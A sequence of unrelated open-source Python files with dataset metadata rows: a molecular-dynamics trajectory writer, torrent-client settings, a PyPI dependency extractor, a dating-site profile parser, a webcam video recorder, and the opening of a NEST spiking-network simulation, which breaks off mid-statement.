>>> ext_analyze = espressopp.integrator.ExtAnalyze(dump_conf_xyz, 10)
>>> integrator.addExtension(ext_analyze)
>>> integrator.run(2000)
Both examples will give the same result: 200 configurations in trajectory .xyz file.
setting up length scale
For example, the Lennard-Jones model for liquid argon with :math:`\sigma=0.34 [nm]`
>>> dump_conf_xyz = espressopp.io.DumpXYZ(system, integrator, filename='trj.xyz', \
>>> unfolded=False, length_factor=0.34, \
>>> length_unit='nm', store_pids=True, \
>>> store_velocities = True, append=True)
will produce trj.xyz with in nanometers
.. function:: espressopp.io.DumpXYZ(system, integrator, filename=out.xyz, unfolded=False,\
length_factor=1.0, length_unit='LJ', store_pids=False,\
store_velocities=False, append=True)
:param system:
:param integrator:
:param filename:
:param bool unfolded:
:param real length_factor:
:param length_unit:
:param bool store_pids:
:param bool store_velocities:
:param bool append:
:type system:
:type integrator:
:type filename:
:type length_unit:
.. function:: espressopp.io.DumpXYZ.dump()
:rtype:
"""
from espressopp.esutil import cxxinit
from espressopp import pmi
from espressopp.ParticleAccess import *
from _espressopp import io_DumpXYZ
class DumpXYZLocal(ParticleAccessLocal, io_DumpXYZ):
    """Per-worker wrapper around the C++ ``io_DumpXYZ`` trajectory writer."""

    def __init__(self, system, integrator, filename='out.xyz', unfolded=False, length_factor=1.0, length_unit='LJ', store_pids=False, store_velocities=False, append=True):
        # Initialize the underlying C++ object with all dump options.
        cxxinit(self, io_DumpXYZ, system, integrator, filename, unfolded, length_factor, length_unit, store_pids, store_velocities, append)

    def dump(self):
        # Write only when no PMI worker group is active, or when this rank
        # belongs to the active group -- presumably to avoid duplicate
        # writes from idle ranks (TODO confirm against pmi internals).
        if not (pmi._PMIComm and pmi._PMIComm.isActive()) or pmi._MPIcomm.rank in pmi._PMIComm.getMPIcpugroup():
            self.cxxclass.dump(self)
# On the controller rank, expose a PMI proxy class that forwards calls
# and property access to the DumpXYZLocal instances on the workers.
if pmi.isController :
    class DumpXYZ(ParticleAccess, metaclass=pmi.Proxy):
        # Forwarding rules for the proxy: which class to instantiate on the
        # workers, which methods to broadcast, which properties to mirror.
        pmiproxydefs = dict(
            cls = 'espressopp.io.DumpXYZLocal',
            pmicall = [ 'dump' ],
            pmiproperty = ['filename', 'unfolded', 'length_factor', 'length_unit', 'store_pids', 'store_velocities', 'append']
        )
| espressopp/espressopp | src/io/DumpXYZ.py | Python | gpl-3.0 | 4,709 | [
"ESPResSo"
] | 91b669149e0084691c70a29c6d1072afa40cdbdc607c4fc7f4440a88ef92ac18 |
# -*- coding: utf-8 -*-
import os, json
import flannelfox.tools
from collections import OrderedDict
# Root directory for all flannelfox files: the FF_ROOT environment
# variable wins; otherwise fall back to the current user's home directory.
if os.environ.get('FF_ROOT', False):
    HOME_DIR = os.environ.get('FF_ROOT')
else:
    HOME_DIR = os.path.expanduser('~')
# #############################################################################
# Special variables to handle formatting names
# #############################################################################
# These are torrentTitle prefixes that should be ignored when creating torrent
# objects. This is mainly to fix rss feeds that have bad file entries in front.
BAD_PREFIXES = [
'autofill fail',
'TvHD \d+ \d+',
'TvSD \d+ \d+'
]
# These are keywords such as sources that come in multiple forms, but need to
# be reconciled into one to make it easier to grab them
# ORDER IS IMPORTANT
KEYWORD_SYNONYMS = OrderedDict([
('blu\-ray','bluray'),
('bdrip','bluray'),
('brrip','bluray'),
('hd\-dvd','hddvd'),
('web\-dl','webdl'),
('web\-rip','webrip'),
('x264','h264'),
('h.264','h264'),
('h264.?hi10p','h264hi10p'),
('vc\-1','vc1'),
('v0 ?\(?vbr\)?','v0vbr'),
('v1 ?\(?vbr\)?','v1vbr'),
('v2 ?\(?vbr\)?','v2vbr'),
('v8 ?\(?vbr\)?','v8vbr'),
('aps ?\(?vbr\)?','apsvbr'),
('apx ?\(?vbr\)?','apxvbr')
])
# This is a list of properties that are ignored during torrent comparison
FUZZY_PROPERTIES = [
# Properties ignored in a comparison, in order to achieve a preference
# of certain quality then you need to make the source feed "upgradable"
'quality',
'source',
'container',
'codec',
# Properties ignored due to being related to RSS
'torrentTitle',
'url',
# Properties ignored due to being related to storage
'feedDestination',
# Properties ignored due to being based on ratio/timing
'addedOn',
'added',
'queuedOn',
'minTime',
'minRatio',
'comparison',
'hashString',
# Properties ignored due to being based on transmission responses
'id',
'error',
'errorString',
'uploadRatio',
'percentDone',
'doneDate',
'activityDate',
'rateUpload',
'downloadDir',
'seedTime',
'status'
]
# #############################################################################
settings = {
'files':{
'defaultTorrentLocation': os.path.join(HOME_DIR, 'files'),
'maxUsedSpaceDir': os.path.join(HOME_DIR, 'files'),
'privateDir': os.path.join(HOME_DIR, '.flannelfox'),
'configDir': os.path.join(HOME_DIR, '.flannelfox/config'),
'logDir': os.path.join(HOME_DIR, '.flannelfox/logs'),
'toolsDir': os.path.join(HOME_DIR, 'tools'),
'settingsConfigFile': os.path.join(HOME_DIR, '.flannelfox/config/settings.json'),
'feedConfigDir': os.path.join(HOME_DIR, '.flannelfox/config/feeds'),
'rssConfigDir': os.path.join(HOME_DIR, '.flannelfox/config/feeds/rssfeeds'),
'lastfmConfigDir': os.path.join(HOME_DIR, '.flannelfox/config/feeds/lastfmfeeds'),
'lastfmCacheDir': os.path.join(HOME_DIR, '.flannelfox/cache/LastfmArtistsConfigCache'),
'traktConfigDir': os.path.join(HOME_DIR, '.flannelfox/config/feeds/traktfeeds'),
'traktCacheDir': os.path.join(HOME_DIR, '.flannelfox/cache/TraktConfigCache'),
'goodreadsConfigDir': os.path.join(HOME_DIR, '.flannelfox/config/feeds/goodreadsfeeds'),
'goodreadsCacheDir': os.path.join(HOME_DIR, '.flannelfox/cache/GoodreadsConfigCache')
},
'apis':{
'lastfm':'https://ws.audioscrobbler.com/2.0',
'trakt':'https://api-v2launch.trakt.tv',
'goodreads':'https://www.goodreads.com'
},
'database':{
'defaultDatabaseEngine': 'SQLITE3'
},
'queueManagement':{
'maxTorrents': 300,
'maxDownloadingTorrents': 5,
'strictQueueManagement': False
},
'client':{
'name': 'transmission-server1',
'type': 'transmission',
'host': '127.0.0.1',
'https': False,
'port': '9091',
'rpcLocation': 'transmission/rpc',
'user': '',
'password': ''
},
'tvTitleMappings': {
'teen titans go':'teen titans go!',
'uncle buck':'uncle buck 2016',
'chicago p d':'chicago p.d.',
'chicago pd':'chicago p.d.',
'guardians of the galaxy':'marvels guardians of the galaxy',
'ultimate spider man vs the sinister 6':'ultimate spider man',
'marvels ultimate spider man vs the sinister 6':'ultimate spider man',
'scandal us':'scandal',
'scandal 2012':'scandal',
'doctor who':'doctor who 2005',
'house of cards 2013':'house of cards us',
'the flash':'the flash 2014',
'dcs legends of tomorrow':'dc\'s legends of tomorrow',
'dc s legends of tomorrow':'dc\'s legends of tomorrow',
'the magicians 2016':'the magicians 2015',
'the magicians us':'the magicians 2015',
'law and order special victims unit':'law and order: svu'
},
'debugLevel': 'info',
'minimumFreeSpace': 0,
'maxUsedSpace': 600,
'queueDaemonThreadSleep': 60,
'rssDaemonThreadSleep': 60,
'maxRssThreads': 8
}
def getSettings():
    # Accessor for the module-level settings dictionary.
    return settings
def readSettingsFile(settingsFile=settings['files']['settingsConfigFile']):
    """Read the JSON settings file and return its raw text.

    Returns the string '{}' when the file cannot be read, so callers can
    always feed the result straight into json.loads().
    """
    try:
        with open(settingsFile, 'r') as fileHandle:
            return fileHandle.read()
    except Exception:
        return '{}'
def updateSettings(settingsFile=settings['files']['settingsConfigFile']):
    """Merge the on-disk JSON settings into the module-level defaults.

    BUG FIX: the original bound the merge result to a *local* name
    ``settings``, so the merged configuration was computed and then
    silently discarded. Declaring the module global makes the update
    actually take effect.
    """
    global settings
    importedSettings = readSettingsFile(settingsFile)
    settings = flannelfox.tools.dictMerge(getSettings(), json.loads(importedSettings))
# Apply any on-disk overrides as soon as this module is imported.
updateSettings()
"Galaxy"
] | 35c49bc9c2452851ffb615eec50b81e0af72516212f56acb88fa8353fa50c545 |
"""Get dependencies from packages on the Python Package Index (PyPI)
Adapted from Olivier Girardot's notebook:
https://github.com/ogirardot/meta-deps/blob/master/PyPi%20Metadata.ipynb
licensed under the Creative Commons Attribution 3.0 Unported License.
To view a copy of that license, visit
http://creativecommons.org/licenses/by/3.0/
Changes:
- Read import statements in all .py files, instead of install_requires list in
setup.py
- Read zip files instead of tar files
- Don't produce graph
- Remove json
"""
import xmlrpc.client as xmlrpclib
import re, requests, csv, tarfile
def compression_type(filename):
    """Return the compression type of *filename* based on its magic bytes.

    Returns one of 'gz', 'bz2', 'zip' or 'tar', or None when no known
    signature matches (or the file cannot be read).

    FIX over the original (adapted from http://stackoverflow.com/a/13044946):
    magic numbers are binary, so the file is now opened in binary mode and
    compared as bytes. The old version read in text mode and fell back to
    latin-1 on a UnicodeDecodeError, which was fragile and could misread
    the signature bytes.
    """
    compression_dict = {
        b"\x1f\x8b\x08": "gz",
        b"\x42\x5a\x68": "bz2",
        b"\x50\x4b\x03\x04": "zip",
        # NOTE(review): \x1f\x9d is actually the unix compress (.Z) magic,
        # not tar; the label is kept for backward compatibility.
        b"\x1f\x9d": "tar"
    }
    max_len = max(len(sig) for sig in compression_dict)
    try:
        with open(filename, "rb") as f:
            file_start = f.read(max_len)
    except OSError:
        return None
    for sig, filetype in compression_dict.items():
        if file_start.startswith(sig):
            return filetype
    return None
def extract_dependencies(content):
    """Extract top-level imported package names from Python source text.

    Scans *content* line by line for ``import foo`` and ``from foo import
    bar`` statements and returns the set of top-level package names (the
    part before the first dot). Relative imports (``from . import x``)
    are ignored and ``as`` aliases are stripped.

    Bug fixes over the original regex-based version:
    * ``import foo, bar`` now yields both names (the old non-greedy
      ``\\w*?`` pattern could not match past the comma, so multi-imports
      were dropped entirely).
    * Dotted modules (``import foo.bar``, ``from foo.bar import baz``)
      now yield their top-level package instead of being skipped.
    """
    deps = set()
    for line in content.split('\n'):
        line = line.strip()  # we don't care about indentation
        if not (line.startswith("from") or line.startswith("import")):
            continue
        # Drop any trailing comment.
        if '#' in line:
            line = line.split("#", 1)[0].strip()
        if line.startswith('from'):  # from foo(.bar) import baz
            candidates = re.findall(r"^from\s+([\w.]+)\s+import\b", line)
        else:  # import foo(.bar)(, qux)( as alias)
            match = re.match(r"^import\s+(.+)$", line)
            if not match:
                continue
            candidates = [part.strip().split(' as ')[0].strip()
                          for part in match.group(1).split(',')]
        for candidate in candidates:
            top_level = candidate.split('.')[0].strip()
            # Skip relative imports (empty top level) and malformed pieces.
            if top_level:
                deps.add(top_level)
    return deps
def _extract_content(package_file):
"""Extract content from compressed package - .py files only"""
try:
tar = tarfile.open(package_file)
except:
return None
filenames = tar.getnames()
py_files = [elem for elem in filenames if elem.endswith('.py')]
for py_file in py_files:
try:
content = tar.extractfile(py_file).read().decode()
yield content
except:
yield None
pyx_files = [elem for elem in filenames if elem.endswith('.pyx')]
if len(pyx_files) > 0:
yield 'import cython'
# Module-level XML-RPC client for the PyPI API, shared as the default
# `client` argument of extract_package().
DEFAULT_CLIENT = xmlrpclib.ServerProxy('http://pypi.python.org/pypi')
def extract_package(name, to='pypi-deps.txt', client=DEFAULT_CLIENT):
    """Download the latest sdist of PyPI package *name*, extract its
    import-level dependencies, and append them to *to* as
    tab-separated ``name<TAB>dependency`` lines."""
    tmpfilename = '/tmp/temp_py_package.tar.gz'
    with open(to, 'a') as fout:
        try:
            releases = client.package_releases(name)
        except Exception as e:
            print(e, "internet connection issues?")
            return
        if len(releases) == 0:
            # Package has no releases on PyPI; nothing to do.
            return
        release = client.package_releases(name)[0]  # use only latest release
        docs = client.release_urls(name, release)
        if len(docs) > 0:
            # Find the first source distribution among the release files.
            url = None
            for doc in docs:
                if doc['packagetype'] == 'sdist':
                    url = doc.get('url')
                    break
            if url is None:
                # No sdist available; skip this package.
                return
            try:
                req = requests.get(url)
                if req.status_code == 200:
                    with open(tmpfilename, 'wb') as tar_file:
                        tar_file.write(req.content)
                    # Union of dependencies across every .py file in the sdist.
                    dependencies = set()
                    for content in _extract_content(tmpfilename):
                        if content is not None:
                            dependencies.update(extract_dependencies(content))
                    for dep in dependencies:
                        fout.write(name + '\t' + dep + '\n')
                else:
                    print("Could not download {0}, status code {1}".format(url, req.status_code))
            # NOTE(review): this catches the *builtin* ConnectionError, not
            # requests.exceptions.ConnectionError -- confirm it intercepts
            # the failures it is meant to (requests' exception does subclass
            # OSError/ConnectionError only in some versions).
            except ConnectionError:
                print('ConnectionError: ', url)
if __name__ == '__main__':
    import random
    client = xmlrpclib.ServerProxy('http://pypi.python.org/pypi')
    to='pypi-deps.txt'
    packages = client.list_packages()
    # Shuffle so repeated runs sample different parts of the index first.
    random.shuffle(packages)
    # Check if package is already in the output file (useful for restarting after a failure)
    try:
        with open(to, 'r') as fin:
            done_packages = set([line.split()[0] for line in fin])
    except FileNotFoundError:
        done_packages = set()
    # initialising variables for progress bar
    i = len(done_packages)
    n = len(packages)
    prev_percent_done = 0
    for package in packages:
        if package not in done_packages:
            extract_package(package, to=to, client=client)
        i += 1 # for progress bar
        # progress bar: only print when the integer percentage advances
        percent_done = round(i/n*100)
        if percent_done > prev_percent_done:
            print('{0}% done ({1} of {2})'.format(percent_done,i,n))
            prev_percent_done = percent_done
| hdashnow/python-dependencies | dependencies.py | Python | mit | 5,312 | [
"VisIt"
] | c7170bef28fb2ecf9effe57226ce83138f9cf1e3df6d7af68dbcd66bdea16ef5 |
# -*- coding: utf-8 -*-
# Copyright(C) 2008-2011 Romain Bignon
#
# This file is part of a weboob module.
#
# This weboob module is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This weboob module is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this weboob module. If not, see <http://www.gnu.org/licenses/>.
try:
from HTMLParser import HTMLParser
except ImportError:
from html.parser import HTMLParser
import socket
from datetime import datetime
from dateutil.parser import parse as parse_dt
from collections import OrderedDict
from weboob.capabilities.contact import Contact as _Contact, ProfileNode
from weboob.tools.html import html2text
from weboob.tools.compat import unicode, basestring
class FieldBase(object):
    """Base class for profile-field renderers.

    Holds up to two lookup keys into the raw profile dictionary; concrete
    subclasses override :meth:`get_value` to turn the stored entry into a
    display value.
    """

    def __init__(self, key, key2=None):
        # Primary key, plus an optional secondary key for two-field renderers.
        self.key, self.key2 = key, key2

    def get_value(self, value, consts):
        # Subclass responsibility.
        raise NotImplementedError()
class FieldStr(FieldBase):
    """Render a profile entry as stripped plain text (HTML removed)."""

    def get_value(self, profile, consts):
        text = html2text(unicode(profile[self.key]))
        return text.strip()
class FieldBool(FieldBase):
    """Interpret a '0'/'1'-style profile entry as a boolean."""

    def get_value(self, profile, consts):
        return int(profile[self.key]) != 0
class FieldDist(FieldBase):
    """Format a distance entry as a two-decimal kilometre string."""

    def get_value(self, profile, consts):
        km = float(profile[self.key])
        return '%.2f km' % km
class FieldIP(FieldBase):
    """Display the last-seen IP as a hostname, noting the first-seen IP."""

    def get_hostname(self, s):
        # Reverse-DNS lookup; fall back to the raw address when it fails.
        try:
            host, _aliases, _addrs = socket.gethostbyaddr(s)
        except (socket.gaierror, socket.herror):
            return s
        return host

    def get_value(self, profile, consts):
        last_ip = profile[self.key]
        first_ip = profile[self.key2]
        result = self.get_hostname(last_ip)
        if last_ip != first_ip:
            result += ' (first %s)' % self.get_hostname(first_ip)
        return result
class FieldProfileURL(FieldBase):
    """Build a link to an adopteunmec profile, or '' when the id is unset."""

    def get_value(self, profile, consts):
        profile_id = int(profile[self.key])
        if profile_id <= 0:
            return ''
        return 'http://www.adopteunmec.com/index.php/profile/%d' % profile_id
class FieldPopu(FieldBase):
    """Fetch one counter from the profile's nested 'popu' statistics dict."""

    def get_value(self, profile, consts):
        counter = profile['popu'][self.key]
        return unicode(counter)
class FieldPopuRatio(FieldBase):
    """Ratio of two 'popu' counters as a 2-decimal string ('NaN' on /0)."""

    def get_value(self, profile, consts):
        numerator = float(profile['popu'][self.key])
        denominator = float(profile['popu'][self.key2])
        if denominator == 0.0:
            return 'NaN'
        return '%.2f' % (numerator / denominator)
class FieldOld(FieldBase):
    """Age in whole years derived from a birthdate string."""

    def get_value(self, profile, consts):
        birthday = parse_dt(profile[self.key])
        age_days = (datetime.now() - birthday).days
        return int(age_days / 365.25)
class FieldList(FieldBase):
    """Pass a list-valued profile entry through unchanged."""

    def get_value(self, profile, consts):
        return profile[self.key]
class FieldBMI(FieldBase):
    """Body-mass index: numeric (fat=False) or a category label (fat=True)."""

    # (upper bound, label) pairs scanned in order; above the last -> 'obese'.
    _CATEGORIES = ((15.5, 'severely underweight'),
                   (18.4, 'underweight'),
                   (24.9, 'normal'),
                   (30, 'overweight'))

    def __init__(self, key, key2, fat=False):
        FieldBase.__init__(self, key, key2)
        self.fat = fat

    def get_value(self, profile, consts):
        height = int(profile[self.key])
        weight = int(profile[self.key2])
        if height == 0 or weight == 0:
            # Either measurement missing: nothing sensible to show.
            return ''
        bmi = weight / float((height / 100.0) ** 2)
        if not self.fat:
            return bmi
        for bound, label in self._CATEGORIES:
            if bmi < bound:
                return label
        return 'obese'
class FieldConst(FieldBase):
    """Map stored constant id(s) to their human-readable label(s)."""

    def get_value(self, profile, consts):
        v = profile[self.key]
        if isinstance(v, (basestring, int)):
            # Single id: look its label up, tolerating unknown ids.
            try:
                return consts[self.key][str(v)]
            except KeyError:
                return ''
        elif isinstance(v, (tuple, list)):
            # Sequence of ids: map each one (an unknown id raises here,
            # matching the historical behaviour).
            return [consts[self.key][i] for i in v]
class Contact(_Contact):
    """An adopteunmec profile rendered as a weboob Contact.

    ``TABLE`` maps output sections to ordered renderers keyed by raw
    profile-dictionary fields.  Section-name prefixes encode display rules:
    ``_`` marks a head section, ``+`` shows the section only when
    profile['sex'] == 1, ``-`` only when profile['sex'] == 0.
    """
    TABLE = OrderedDict((
        ('_info', OrderedDict((
            ('title', FieldStr('title')),
            # ipaddr is not available anymore.
            #('IPaddr', FieldIP('last_ip', 'first_ip')),
            ('admin', FieldBool('admin')),
            ('ban', FieldBool('isBan')),
            ('first', FieldStr('first_cnx')),
            ('godfather', FieldProfileURL('godfather')),
        ))),
        ('_stats', OrderedDict((
            ('mails', FieldPopu('mails')),
            ('charms', FieldPopu('charmes')),
            ('visites', FieldPopu('visites')),
            ('baskets', FieldPopu('panier')),
            ('invits', FieldPopu('invits')),
            ('bonus', FieldPopu('bonus')),
            ('score', FieldStr('points')),
            ('ratio', FieldPopuRatio('mails', 'charmes')),
            ('mailable', FieldBool('can_mail')),
        ))),
        ('details', OrderedDict((
            #('old', FieldStr('age')),
            ('old', FieldOld('birthdate')),
            ('birthday', FieldStr('birthdate')),
            ('zipcode', FieldStr('zip')),
            ('location', FieldStr('city')),
            ('distance', FieldDist('dist')),
            ('country', FieldStr('country')),
            ('phone', FieldStr('phone')),
            ('eyes', FieldConst('eyes_color')),
            ('hair_color', FieldConst('hair_color')),
            ('hair_size', FieldConst('hair_size')),
            ('height', FieldConst('size')),
            ('weight', FieldConst('weight')),
            ('BMI', FieldBMI('size', 'weight')),
            ('fat', FieldBMI('size', 'weight', fat=True)),
            ('shape', FieldConst('shape')),
            ('origins', FieldConst('origins')),
            ('signs', FieldConst('features')),
            ('job', FieldStr('job')),
            ('style', FieldConst('styles')),
            ('food', FieldConst('diet')),
            ('favorite_food', FieldConst('favourite_food')),
            ('drink', FieldConst('alcohol')),
            ('smoke', FieldConst('tobacco')),
        ))),
        ('tastes', OrderedDict((
            ('hobbies', FieldStr('hobbies')),
            ('music', FieldList('music')),
            ('cinema', FieldList('cinema')),
            ('books', FieldList('books')),
            ('tv', FieldList('tvs')),
        ))),
        ('+sex', OrderedDict((
            ('underwear', FieldConst('underwear')),
            ('practices', FieldConst('sexgames')),
            ('favorite', FieldConst('arousing')),
            ('toys', FieldConst('sextoys')),
        ))),
        ('+personality', OrderedDict((
            ('snap', FieldStr('fall_for')),
            ('exciting', FieldStr('turned_on_by')),
            ('hate', FieldStr('cant_stand')),
            ('vices', FieldStr('vices')),
            ('assets', FieldStr('assets')),
            ('fantasies', FieldStr('fantasies')),
            ('is', FieldConst('character')),
        ))),
        ('-personality', OrderedDict((
            ('accessories', FieldConst('accessories')),
            ('skills', FieldConst('skills')),
            ('socios', FieldConst('socios')),
            ('family', FieldConst('family')),
            ('pets', FieldConst('pets')),
        )))
    ))
    def parse_profile(self, profile, consts):
        """Populate this contact (status, summary, photos, profile tree)
        from the raw *profile* dict, using *consts* to label constant ids.
        """
        if profile['online']:
            self.status = Contact.STATUS_ONLINE
            self.status_msg = u'online'
            # NOTE(review): the assignment above is immediately overwritten;
            # it looks like 'online since %s' was intended — confirm.
            self.status_msg = u'since %s' % profile['last_cnx']
        else:
            self.status = Contact.STATUS_OFFLINE
            self.status_msg = u'last connection %s' % profile['last_cnx']
        # The announce text is HTML-escaped on the wire; unescape and strip.
        self.summary = unicode(HTMLParser().unescape(profile.get('announce', '').strip()))
        if len(profile.get('shopping_list', '')) > 0:
            self.summary += u'\n\nLooking for:\n%s' % HTMLParser().unescape(profile['shopping_list'].strip())
        # Register each picture with its full-size and thumbnail variants.
        for photo in profile['pics']:
            self.set_photo(photo.split('/')[-1],
                           url=photo + '/full',
                           thumbnail_url=photo + '/small',
                           hidden=False)
        self.profile = OrderedDict()
        if 'sex' in profile:
            for section, d in self.TABLE.items():
                flags = ProfileNode.SECTION
                if section.startswith('_'):
                    flags |= ProfileNode.HEAD
                # Skip sections whose +/- prefix does not match the sex.
                if (section.startswith('+') and int(profile['sex']) != 1) or \
                   (section.startswith('-') and int(profile['sex']) != 0):
                    continue
                section = section.lstrip('_+-')
                s = ProfileNode(section, section.capitalize(), OrderedDict(), flags=flags)
                for key, builder in d.items():
                    try:
                        value = builder.get_value(profile, consts[int(profile['sex'])])
                    except KeyError:
                        # Field absent from this profile: just omit it.
                        pass
                    else:
                        s.value[key] = ProfileNode(key, key.capitalize().replace('_', ' '), value)
                self.profile[section] = s
        # Keep the raw payload around for later inspection.
        self._aum_profile = profile
| laurentb/weboob | modules/aum/contact.py | Python | lgpl-3.0 | 11,860 | [
"exciting"
] | cad69e175186897a6eed8fe3522325de7ffbd6774bc0766740f1b28672cb0d2b |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# This import line is required to pull in pygame.camera support
#
import sys ;
# Prefer a locally-built pygame 1.9.0rc1 (camera module) over the system one.
sys.path.insert(0, "/home/zathras/Documents/pygame-1.9.0rc1/build/lib.linux-i686-2.5")
import time
import pygame
import pygame.camera
import Axon
import Image # PIL - Python Imaging Library
from Kamaelia.Chassis.Pipeline import Pipeline
from Kamaelia.Codec.Dirac import DiracEncoder, DiracDecoder
from Kamaelia.UI.Pygame.VideoOverlay import VideoOverlay
from Kamaelia.Video.PixFormatConversion import ToYUV420_planar
from Kamaelia.File.Writing import SimpleFileWriter
from Kamaelia.Util.PureTransformer import PureTransformer
# Initialise pygame and its camera subsystem before any component runs.
pygame.init()
pygame.camera.init()
class VideoCapturePlayer(Axon.ThreadedComponent.threadedcomponent):
    """Threaded Kamaelia component that grabs webcam frames and sends
    (timestamp, pygame.Surface) tuples on its "outbox" at roughly 15 fps.

    NOTE(review): despite the name, nothing is ever blitted to
    ``self.display`` — the window is only opened.  ``displaysize`` /
    ``capturesize`` / ``mirror`` / ``delay`` look like tunables, but
    ``main()`` uses its own hard-coded 352x288 / 15 fps values; confirm
    before relying on them.
    """
    displaysize = (1024, 768)
    capturesize = ( 640, 480 )
    mirror = True
    delay = 1/24.0
    def __init__(self, **argd):
        # Keyword arguments override the class-level defaults above.
        self.__dict__.update(**argd)
        super(VideoCapturePlayer, self).__init__(**argd)
        self.display = pygame.display.set_mode( self.displaysize )
        # NOTE(review): the stray "X=" chained assignment binds a throwaway
        # local; harmless but probably leftover debugging.
        self.camera = X=pygame.camera.Camera("/dev/video0", (352,288))
        self.camera.start()
        self.snapshot = None
    def get_and_flip(self):
        """Grab one frame from the camera into self.snapshot."""
        self.snapshot = None
        self.snapshot = self.camera.get_image()
    def main(self):
        """Capture loop with a self-tuning sleep ("fudge") that nudges the
        measured frame rate towards the target tfr."""
        c = 0                    # frames captured so far
        tfr = 15.0               # target frame rate (fps)
        Itfr = int((tfr/2)+0.5)  # report/adjust every this many frames
        tfrU = tfr + 0.05        # upper tolerance on the measured rate
        tfrL = tfr - 0.05        # lower tolerance (unused below — see NOTE)
        d = 1/tfr                # ideal inter-frame period (s)
        fudge = 0                # accumulated sleep correction (s)
        ts = t = time.time()
        while 1:
            self.get_and_flip()
            t2 = time.time()
            dt = t2-t            # time spent capturing this frame
            d = 1/tfr
            s = d - dt + fudge   # sleep needed to hit the target period
            if s<0:
                s=0.0
            time.sleep(s)
            self.send((t2,self.snapshot), "outbox")
            t = time.time()
            c += 1
            if (c % Itfr) ==0:
                f= c/(t2-ts)     # average frame rate since start
                print "framerate", f,"cpu", dt, "target", d, "sleep",s
                # NOTE(review): both branches compare against tfrU; tfrL is
                # never used, so the rate oscillates around the upper bound.
                # Possibly ``f<tfrL`` was intended — confirm before changing.
                if f>tfrU:
                    fudge += 0.001
                if f<tfrU:
                    fudge -= 0.001
# Assemble and run the capture -> YUV conversion -> Dirac encode -> file
# pipeline.  (Python 2 syntax: the PureTransformer lambda relies on tuple
# parameter unpacking, which was removed in Python 3.)
Pipeline(
   VideoCapturePlayer(),
   PureTransformer(lambda (i,F) : {
       "rgb" : pygame.image.tostring(F, "RGB"),
       "size" : (352, 288),
       "pixformat" : "RGB_interleaved",
   }),
   ToYUV420_planar(),
   DiracEncoder(preset="CIF", encParams={"num_L1":0}),
   SimpleFileWriter("X.drc"),
).run()
| sparkslabs/kamaelia | Sketches/MPS/VideoRecorder/VideoRecord.py | Python | apache-2.0 | 3,283 | [
"DIRAC"
] | 3d0a03726f8d421049b2f6e982f8ac520ef130a965c36c7f9ee9f5444bfb7cd8 |
# -*- coding: utf-8 -*-
#
# brunel_delta_nest.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
"""Random balanced network (delta synapses)
----------------------------------------------
This script simulates an excitatory and an inhibitory population on
the basis of the network used in [1]_
When connecting the network customary synapse models are used, which
allow for querying the number of created synapses. Using spike
detectors the average firing rates of the neurons in the populations
are established. The building as well as the simulation time of the
network are recorded.
References
~~~~~~~~~~~~~~
.. [1] Brunel N (2000). Dynamics of sparsely connected networks of excitatory and
inhibitory spiking neurons. Journal of Computational Neuroscience 8,
183-208.
"""
###############################################################################
# Import all necessary modules for simulation, analysis and plotting.
import time
import nest
import nest.raster_plot
import matplotlib.pyplot as plt
nest.ResetKernel()
###############################################################################
# Assigning the current time to a variable in order to determine the build
# time of the network.
startbuild = time.time()
###############################################################################
# Assigning the simulation parameters to variables.
dt = 0.1 # the resolution in ms
simtime = 1000.0 # Simulation time in ms
delay = 1.5 # synaptic delay in ms
###############################################################################
# Definition of the parameters crucial for asynchronous irregular firing of
# the neurons.
g = 5.0 # ratio inhibitory weight/excitatory weight
eta = 2.0 # external rate relative to threshold rate
epsilon = 0.1 # connection probability
###############################################################################
# Definition of the number of neurons in the network and the number of
# neurons recorded from.
order = 2500
NE = 4 * order # number of excitatory neurons
NI = 1 * order # number of inhibitory neurons
N_neurons = NE + NI # number of neurons in total
N_rec = 50 # record from 50 neurons
###############################################################################
# Definition of connectivity parameters.
CE = int(epsilon * NE) # number of excitatory synapses per neuron
CI = int(epsilon * NI) # number of inhibitory synapses per neuron
C_tot = int(CI + CE) # total number of synapses per neuron
###############################################################################
# Initialization of the parameters of the integrate-and-fire neuron and the
# synapses. The parameters of the neuron are stored in a dictionary.
tauMem = 20.0 # time constant of membrane potential in ms
theta = 20.0 # membrane threshold potential in mV
neuron_params = {"C_m": 1.0,
                 "tau_m": tauMem,
                 "t_ref": 2.0,
                 "E_L": 0.0,
                 "V_reset": 0.0,
                 "V_m": 0.0,
                 "V_th": theta}
J = 0.1 # postsynaptic amplitude in mV
J_ex = J # amplitude of excitatory postsynaptic potential
J_in = -g * J_ex # amplitude of inhibitory postsynaptic potential
###############################################################################
# Definition of threshold rate, which is the external rate needed to fix the
# membrane potential around its threshold, the external firing rate and the
# rate of the poisson generator which is multiplied by the in-degree CE and
# converted to Hz by multiplication by 1000.
nu_th = theta / (J * CE * tauMem)
nu_ex = eta * nu_th
p_rate = 1000.0 * nu_ex * CE
###############################################################################
# Configuration of the simulation kernel by the previously defined time
# resolution used in the simulation. Setting ``print_time`` to `True` prints the
# already processed simulation time as well as its percentage of the total
# simulation time.
nest.SetKernelStatus({"resolution": dt, "print_time": True,
